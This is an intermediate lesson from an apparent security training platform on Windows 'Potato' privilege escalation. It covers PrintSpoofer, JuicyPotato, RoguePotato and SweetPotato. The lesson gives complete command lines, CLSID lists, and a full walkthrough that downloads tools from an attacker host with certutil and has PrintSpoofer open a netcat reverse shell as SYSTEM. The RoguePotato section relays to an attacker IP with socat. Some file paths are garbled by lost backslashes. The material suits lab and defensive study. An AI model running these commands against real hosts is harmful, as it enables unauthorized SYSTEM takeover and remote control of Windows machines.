Potato Attacks

intermediate40 minWriteup

JuicyPotato, PrintSpoofer, and other potato attacks

Learning Objectives

  • Understand potato attack family
  • Use JuicyPotato
  • Use PrintSpoofer
  • Use newer potato variants

Potato attacks are a family of Windows privilege escalation techniques that abuse

to get SYSTEM access. They work by tricking Windows into authenticating to a fake server we control, then impersonating that authentication.

Why "Potato"? The first technique was called "Hot Potato", and the name stuck. Now we have a whole garden: JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato, and more. Each works slightly differently but achieves the same goal: SYSTEM access from SeImpersonate.

Service Account Essential

Potato attacks require SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege. These are commonly found on IIS, SQL Server, and other service accounts. Check with: whoami /priv

The Potato Family

1Potato Attack Evolution:
2├── Hot Potato (2016)
3│   └── NBNS spoofing + WPAD abuse
4│   └── Patched in MS16-075
5
6├── Rotten Potato (2016)
7│   └── DCOM + NTLM reflection
8│   └── Works on Win 7/8/10, Server 2008-2016
9
10├── JuicyPotato (2018)
11│   └── Improved RottenPotato
12│   └── Works on Win 7/8/10, Server 2008-2016
13│   └── Needs valid CLSID
14│   └── Most popular for older systems
15
16├── RoguePotato (2020)
17│   └── For Windows 10 1809+, Server 2019
18│   └── Uses remote listener
19│   └── Bypasses JuicyPotato mitigations
20
21├── PrintSpoofer (2020)
22│   └── Abuses Print Spooler
23│   └── Works on Win 10/2016/2019
24│   └── Very reliable, simple to use
25
26├── SweetPotato (2020)
27│   └── Combines multiple techniques
28│   └── Works on many versions
29
30└── GodPotato (2022)
31    └── Works on newer Windows versions
32    └── More reliable than predecessors

Which Potato to Use?

For Windows 10/Server 2016+: Try PrintSpoofer first (simplest). For older systems: JuicyPotato. For Windows 10 1809+/Server 2019: RoguePotato or PrintSpoofer.

PrintSpoofer

PrintSpoofer is the simplest and most reliable Potato attack for modern Windows systems. It abuses the Print Spooler service to get SYSTEM.

batch
1REM Requirements:
2REM - SeImpersonatePrivilege (check: whoami /priv)
3REM - Print Spooler service running (default on most systems)
4 
5REM Check requirements
6whoami /priv | findstr /i 606070;">#a5d6ff;">"SeImpersonate"
7REM SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
8 
9sc query spooler | findstr STATE
10REM STATE : 4  RUNNING
11 
12REM Download PrintSpoofer
13REM https:606070;">//github.com/itm4n/PrintSpoofer/releases
14 
15REM Basic usage - spawn SYSTEM cmd
16PrintSpoofer.exe -i -c cmd
17 
18REM Run specific command
19PrintSpoofer.exe -c 606070;">#a5d6ff;">"whoami"
20 
21REM Reverse shell
22PrintSpoofer.exe -c "C:	emp
23c.exe 10.10.14.5 4444 -e cmd"
24 
25REM Example session:
26C:inetpubwwwroot> PrintSpoofer.exe -i -c cmd
27[+] Found privilege: SeImpersonatePrivilege
28[+] Named pipe listening...
29[+] CreateProcessAsUser() OK
30Microsoft Windows [Version 10.0.17763.1]
31(c) 2018 Microsoft Corporation.
32 
33C:Windowssystem32> whoami
34nt authoritysystem

Print Spooler Disabled

If Print Spooler is disabled (for security after PrintNightmare), try other Potato attacks like RoguePotato or SweetPotato.

JuicyPotato

batch
1REM JuicyPotato - works on Windows 7/8/10, Server 2008-2016
2REM Does NOT work on Windows 10 1809+ or Server 2019
3 
4REM Requirements:
5REM - SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
6REM - Valid CLSID for the target OS
7 
8REM Download
9REM https:606070;">//github.com/ohpe/juicy-potato/releases
10 
11REM Basic usage
12JuicyPotato.exe -l 1337 -p C:WindowsSystem32cmd.exe -t *
13 
14REM With specific CLSID (important!)
15JuicyPotato.exe -l 1337 -p C:WindowsSystem32cmd.exe -t * -c {CLSID}
16 
17REM Run reverse shell
18JuicyPotato.exe -l 1337 -p C:	empshell.exe -t *
19 
20REM Run command and capture output
21JuicyPotato.exe -l 1337 -p cmd.exe -a 606070;">#a5d6ff;">"/c whoami > C:	empwhoami.txt" -t *
22 
23REM Common CLSIDs by OS:
24REM Windows 10 Pro: {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
25REM Windows 10 Enterprise: {3c6859ce-230b-48a4-be6c-932c0c202048}
26REM Windows Server 2016: {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
27REM Windows Server 2012: {8BC3F05E-D86B-11D0-A075-00C04FB68820}
28 
29REM Full CLSID list: https:606070;">//github.com/ohpe/juicy-potato/tree/master/CLSID

Finding Valid CLSIDs

batch
1REM If default CLSID fails, find one that works
2 
3REM Use GetCLSID.ps1 to enumerate
4powershell -ep bypass
5Import-Module .GetCLSID.ps1
6Get-CLSID | Export-Csv clsids.csv
7 
8REM Test CLSIDs one by one
9REM Look for ones with LocalService, LocalSystem, etc.
10 
11REM Or use pre-compiled lists based on OS version
12REM https:606070;">//github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

RoguePotato

batch
1REM RoguePotato - for Windows 10 1809+ and Server 2019
2REM Bypasses JuicyPotato mitigations
3 
4REM Requirements:
5REM - SeImpersonatePrivilege
6REM - Ability to redirect traffic (needs remote listener)
7REM - Two machines or port forwarding
8 
9REM On attacker machine - run socat to redirect OXID resolver
10socat tcp-listen:135,reuseaddr,fork tcp:TARGET:9999
11 
12REM On target - run RoguePotato
13RoguePotato.exe -r ATTACKER_IP -e 606070;">#a5d6ff;">"cmd.exe /c whoami > C:	empout.txt" -l 9999
14 
15REM With reverse shell
16RoguePotato.exe -r ATTACKER_IP -e "C:	emp
17c.exe ATTACKER 4444 -e cmd" -l 9999
18 
19REM Simpler usage with local named pipe
20REM (if you can't set up remote redirector)
21REM Use PrintSpoofer instead

SweetPotato

batch
1REM SweetPotato - combines multiple techniques
2REM More reliable across different Windows versions
3 
4REM Download from:
5REM https:606070;">//github.com/CCob/SweetPotato
6 
7REM Basic usage
8SweetPotato.exe -p C:WindowsSystem32cmd.exe -a 606070;">#a5d6ff;">"/c whoami"
9 
10REM Interactive shell
11SweetPotato.exe -p cmd.exe
12 
13REM Reverse shell
14SweetPotato.exe -p C:	empshell.exe
15 
16REM Techniques it tries:
17REM - WinRM (BITS)
18REM - EfsRpc
19REM - PrintSpoofer
20REM Automatically finds what works

Choosing the Right Potato

1Decision Tree for Potato Selection:
2 
31. Check Windows version:
4   systeminfo | findstr /B /C:606070;">#a5d6ff;">"OS Name" /C:"OS Version"
5 
62. Check privileges:
7   whoami /priv | findstr /i 606070;">#a5d6ff;">"impersonate|assign"
8 
93. Choose attack:
10 
11   Windows 7, 8, 10 (pre-1809), Server 2008-2016:
12   └── JuicyPotato (find valid CLSID)
13 
14   Windows 10 1809+, Server 2019+:
15   ├── PrintSpoofer (if Print Spooler running)
16   ├── RoguePotato (if can redirect traffic)
17   ├── SweetPotato (tries multiple methods)
18   └── GodPotato (newest, most compatible)
19 
20   Quick Check:
21   sc query spooler
22   └── Running? → PrintSpoofer
23   └── Stopped? → Try RoguePotato or SweetPotato

Complete Attack Example

batch
1REM Scenario: IIS webshell on Windows Server 2019
2 
3REM 1. Check current user
4whoami
5REM iis apppooldefaultapppool
6 
7REM 2. Check privileges
8whoami /priv
9REM SeImpersonatePrivilege  Enabled  ← GOOD!
10 
11REM 3. Check Windows version
12systeminfo | findstr /B 606070;">#a5d6ff;">"OS"
13REM OS Name: Microsoft Windows Server 2019
14REM → Use PrintSpoofer or newer Potato
15 
16REM 4. Check Print Spooler
17sc query spooler | findstr STATE
18REM STATE: 4 RUNNING  ← GOOD!
19 
20REM 5. Upload PrintSpoofer
21certutil -urlcache -f http:606070;">//10.10.14.5/PrintSpoofer.exe PrintSpoofer.exe
22 
23REM 6. Set up listener on attacker
24nc -lvnp 4444
25 
26REM 7. Upload nc.exe
27certutil -urlcache -f http:606070;">//10.10.14.5/nc.exe nc.exe
28 
29REM 8. Run PrintSpoofer with reverse shell
30PrintSpoofer.exe -c 606070;">#a5d6ff;">"nc.exe 10.10.14.5 4444 -e cmd"
31 
32REM 9. On attacker - catch SYSTEM shell
33REM C:Windowssystem32> whoami
34REM nt authoritysystem

Potato Attack Methodology

Potato Attack Flow

1
Verify Privwhoami /priv - must have SeImpersonate
2
OS Versionsysteminfo to determine Windows version
3
Choose ToolPrintSpoofer, JuicyPotato, or others based on OS
4
Check ServicesVerify required services are running
5
TransferUpload chosen Potato tool and payload
6
ExecuteRun with reverse shell or command
7
SYSTEMEnjoy your SYSTEM shell!

Knowledge Check

Quick Quiz
Question 1 of 3

What privilege is required for all Potato attacks?

Challenges

Potato Escalation

Challenge
🔥 intermediate

You have a shell as IIS AppPool on Windows Server 2016. Escalate to SYSTEM using the appropriate Potato attack.

Need a hint? (4 available)

Key Takeaways

  • Potato attacks turn SeImpersonatePrivilege into SYSTEM access
  • PrintSpoofer: Best for modern Windows with Print Spooler
  • JuicyPotato: For older Windows, needs valid CLSID
  • Service accounts (IIS, SQL) often have SeImpersonate
  • Always check OS version to choose correct tool
  • SweetPotato/GodPotato try multiple techniques automatically